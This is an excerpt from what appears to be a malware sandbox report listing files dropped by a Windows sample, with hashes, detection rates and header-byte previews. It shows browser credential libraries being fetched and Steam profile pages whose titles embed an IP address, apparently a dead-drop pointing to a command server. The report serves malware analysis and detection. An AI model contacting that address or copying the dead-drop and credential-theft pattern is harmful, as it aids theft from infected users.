Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11214848
Entropy (8bit):	7.97772484802616
Encrypted:	false
SSDEEP:	196608:oPnV1Bk/fRaGxUCBIORz5Z2YoZX0tMmp6tgq1D//XxdgPxwdT:oPKfR/UCBF+dZX0tMft/vxdgpG
MD5:	B091C4848287BE6601D720997394D453
SHA1:	9180E34175E1F4644D5FA63227D665B2BE15C75B
SHA-256:	D0B06CA6ECE3FEF6671FA8ACD3D560A9400891ABCD10F5CEDCFE7BD1E6050DFE
SHA-512:	A3B3663FD343389AEE2CBF76F426401D436992B2B56CEA3B60E9C2E385510FA874FA45B2AC75703074F0303934C4223EAEE1983851374A2E753FD0302042CC5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....L.f..........#.................y..........@.............................@............ ...................................................f.d.......X,..`...*...........................................v..(... ..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...h...........................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...4+......................... ..`.text1..8...........................@....text2..\... .....................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Arab[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5713216
Entropy (8bit):	7.99055921980448
Encrypted:	true
SSDEEP:	98304:sn8n3+dVJpuOH9FjvWlc/N/zF3+GHGsCMuQkL3rLliu/OP3anh7AaFOMlrZf:sn8n3+7hPvWlc/v0LQkL3/gOnh7ALMlN
MD5:	B474DC1155AF2463F2F9F603E39264FB
SHA1:	B30E2BCB582A0C300C057428BD3F2B8169F5C7B6
SHA-256:	81031D876F36D8CA2F1B73AA8BDE63134C66F60991070B183E2C1F40463D695C
SHA-512:	0687187C8CEA7098947E57C84DA1A81CBF2F9380F19242FF3F94104BD70B7A21A41C1AA6DE508E4A8D65ACD31FE85FF1AEC4E89C69A0836046CC6FE99B12C7E4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.e..............."............(d............@..........................P........X...@.........................$...J.......@....0................V.@}......T.......................................@.............B..............................text...X........................... ..`.rdata...<..........................@..@.data....H...0......................@....vmp..D........................... ..`.vmp........B.....................@....vmp...tV...B..vV................. ..`.reloc..T.............V.............@..@.rsrc........0........V.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Ledger-Live[1].exe

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	109056
Entropy (8bit):	7.600369754192578
Encrypted:	false
SSDEEP:	1536:lIpbrxKOcuS11Phbiyn2TCdfGyJVGJkyrt517EwM+UPpe5xKOcuS11Phbiyn2TCf:KpbrsISnRGPJkGt74GsISnRF
MD5:	FE380780B5C35BD6D54541791151C2BE
SHA1:	7FE3A583CF91474C733F85CEBF3C857682E269E1
SHA-256:	B64A84D1F88E4E78464A1901C1CB5BBD5F00BB73203D719E64E072157A087B53
SHA-512:	BA05BA8AA13C4BC1CF98FBF6C08B021E8B19354098E0397FC8E1E5D3DCCE367C1063203F24E50D0973193F6535681D0A43486E5DADE5D112853B7A2FE8739B6C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...JE............"...0..2...v.......Q... ...`....@.. ....................................`.................................7Q..O....`.. s...........................P..8............................................ ............... ..H............text....1... ...2.................. ..`.rsrc... s...`...t...4..............@..@.reloc..............................@..B................kQ......H.......d0...9...........j..............................................>. 4......(....2......o....:........o.....0..,........o....r...p $...........%...%....o....t....&...o......(....J.r!..p.s....(....Js....%o....o....&..( ...6.(!....(.......0..$........{....,...}....rK..p.s.......("...f..3...t....}......}......(#....~....-.r...p.....($...o%...s&........~.....~............~......('...Vs....((...t...........{...."..}....*..0..G.......s).....(.......+....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5655872
Entropy (8bit):	7.990599402357966
Encrypted:	true
SSDEEP:	98304:o4waPleUxNjsPr660ZDEJRpvcGs9IiQp9eA4WTFmN:ogPle2Njselcs9ap9eJWTcN
MD5:	A7615F3FAF64E8C2DC8412FC30D5AE17
SHA1:	92AD812D672CA6C6F0927156C0B404A57947C3D4
SHA-256:	5C8618B4628653D6EDEC64F21B5BC96F5698A0829E3245D3A8852DD37E2CB090
SHA-512:	1B5BCAFBB11956B59D2FB15F29E246FB296B192BF675DAF56845EB776307C5ECBE711FA855316A990CAD887B5A2FBCB059DC25039C3B7397815A6537C9F5E594
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 30%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.e...............".............:............@...................................W...@.........................\.c.J.....G.@....................U.@}......................................... ...@............ B..............................text...X........................... ..`.rdata...<..........................@..@.data....H...0......................@....vmp..{........................... ..`.vmp....... B.....................@....vmp.. .U..0B...U................. ..`.reloc...............U.............@..@.rsrc................U.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\june[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1945878
Entropy (8bit):	7.993621351410419
Encrypted:	true
SSDEEP:	49152:32KoXBLPcDl5AENYQHMu2GXH+3yuILkIVRSoP8TWAp:mM5OESezpqYzVGTWAp
MD5:	934A4D455165C851267269B2823667FB
SHA1:	CC52AE8F31716621B9595E5C89A97A4524E16CC3
SHA-256:	8A41B8ED589ACA9E4810BB979DC993D87499B494299475DE87B851BF8C20D7ED
SHA-512:	129DD5908A01B8114C42EE0C1E272AB085B0E83E7C5DE182A582C7328971DB59FBFABB54185E0347CBFAA6E09D584AAF8938DFB0326475E359DF5E3F935C08E8
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....H................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sqlm[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\timeSync[1].exe

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	292864
Entropy (8bit):	5.922649251142475
Encrypted:	false
SSDEEP:	3072:oKTN28++LlAwt+nxdm0Qn4C/pRL7X4SBu8g5zeDq5bQQicHpOUnFYNO9XOddA:H0teiIjg9jEQBrnFYNO9Xk
MD5:	3E827E8493283924563C9CD4D0DFCD0A
SHA1:	B4D63A9D4CC4E698300FCC9991024358869F418C
SHA-256:	C6936B6C28616DC80FABBC270059CE8D396F6F9DA009A3F4AA54E0DB5062ABF0
SHA-512:	94C56B557D171489C5AD806C48DF31E613FC463176C6195A36CFE27A22B39D4B5F2BE5DCCA8A4200B4E3805612B0EA154B60BF76B4542DBF319B204B032D7418
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...g.Qd......................n......<............@...........................o..............................................`..P.... n.................................8............................U..@............................................text...P........................... ..`.rdata..Lj.......l..................@..@.data....l..p...<...V..............@....rsrc........ n.....................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\02[1].bmp

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	data
Category:	dropped
Size (bytes):	5099604
Entropy (8bit):	6.8990348351370185
Encrypted:	false
SSDEEP:	49152:D8q2ADdGoqwUeuhDL5pDCTw+iYtxSgYZmHu0wbPFk5evUvb6cUAbi:D8q2ADwHSM/5oUdYtxrYekuyUD6cBW
MD5:	7F72AAAA855F075B3BF1BE519EFD6224
SHA1:	707E410FE85E1AED075352E4038DD854157B34AF
SHA-256:	6BB079E82BB72CD2EBB0F8AB24E26E9EBA139F48D214A2B3A174E862DF1FF6E6
SHA-512:	DCD941B4089235EA68729132EECB01CCDC4C11A53D23D808A92B8FB261796DC629B939F28DDD0B4BD5A2180887FD6141B2D76AC4975C9240647F3350EF77F1CE
Malicious:	false
Reputation:	unknown
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1.......EP..Y.....................E..e^..........^..5....^......5........................X.....S.[.......................................^.^.....^..............QX.E.....X......................................................5...............5..]...........;apma....{^..5...e^.................5..u;gfgv.........^......g^.................;gpyzv........X......WX................W.................^.....].......5D...7......^....f8.S.........................................../>.=,r*/.=....?.C>.=f."s..=....-.....?..W>.=..ZFk.......?...#>.=.P^k....?...%..........>.=^.%Z5........-........P....P...\|...0...}.......-....f.........5...../....35....-....f.........5...../....35....-....f.........-....fU........5....-j...?f.........5....-......%..X.......>.=I.4D-:.......P........-......?-....5....=....,....3-.....k....z......-........%..J.......>.=a..r5........-........P..........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\76561199658817715[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34657
Entropy (8bit):	5.429541793589228
Encrypted:	false
SSDEEP:	768:k7pqLtWY2wt5D0gqxAiNGAhZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2S2l:k78LtWY2wt5D0gqxAchZ4VWBCW3KI8iF
MD5:	9E1D325252E8FB90C3B3B503BD3C05EF
SHA1:	8F669F2E6B40E78F94D6755D482941A3580200C1
SHA-256:	34DB6F1DCADA9462DEA5342AF93C6A36434855A2A03C15134A965A75C32E045F
SHA-512:	52D2C592B1EEDD72BBFC45FB155465B58C44760957C888F4C5778F9D3EC2BE75F5F49A47D7018C5482ECCE950CF48A2061E05BCA97F563B2433CAECF90AD6139
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: fgsh https://78.46.229.36\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\76561199658817715[2].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34657
Entropy (8bit):	5.429600488558325
Encrypted:	false
SSDEEP:	768:k7pqLtWY2wt5D0gqxAiNGAhZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2S2M:k78LtWY2wt5D0gqxAchZ4VWBCW3KI8is
MD5:	69FA622DECF86B446356F3D3F5751578
SHA1:	75150EC3F3A734B23A59817B25DAB2B2FF8D63B8
SHA-256:	E7445B82A4AF97F1E4121D466B3353639E2D6E83C70CE16C110431010B6D6697
SHA-512:	862EC06CB129674992D831B2CFB71A16293ACDDCBC2E24E5BABA5C48487098F52D4E1F012EACFB2D022BEF7A0D21CFFA19231D11EBBB39651F9CCB121EDFB044
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: fgsh https://78.46.229.36\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\crypted[1].bmp

Download File

Process:	C:\Users\user\Desktop\i1crvbOZAP.exe
File Type:	data
Category:	dropped
Size (bytes):	401548
Entropy (8bit):	7.8250230756085815
Encrypted:	false
SSDEEP:	12288:ajyXPbVPCpF/gueqkIXH5zUtYV3UwxpQ0gro60yy6PA2:MyXPbV6n/YZ8+tK3UwDQDro6py6Pf
MD5:	C2CB93A61F6DEF14850FFA114A5B1677
SHA1:	59E150FA81D85281DD2312EF9EDC9D926017290F
SHA-256:	8B3E74F65EE5A2E8D2719305C36FCDA6126A7EF47166A35250163354097C7FDC
SHA-512:	0EF1BB9CB3878D217B7290680B915DB08996B565F4481B5A769FBDE9E96B9BD4193881F6C5BABEB65DD70D74C4CD2BCD260AC758647F9A710B527F1442335FC5
Malicious:	false
Reputation:	unknown
Preview:	..fUXO......................................................................4..Y.4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;...1.......EP..Y......s............................{....5...........5....................................u.................................5...^.......]................[...5.......................................................5...............5..]...........;apma...a....5......................5..u;gfgv...]...............................;gpyzv.......5.........................W................E.......]............M..........M....0...........................................%..C.......k..../^.........=....5....5....5....f....=............=....=....5....*....g...ef....o?..;=^...=....?....?....%.............?....................?....=^...=....5.........0.....=1........?...%.............?........FO.......f....3?....?....=^...?.....?....%.............?T...........8...8............=^...?..=^...?..=^...?..=^...?..=^...?.....?....=^...=...........0.....=1........5.........0...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
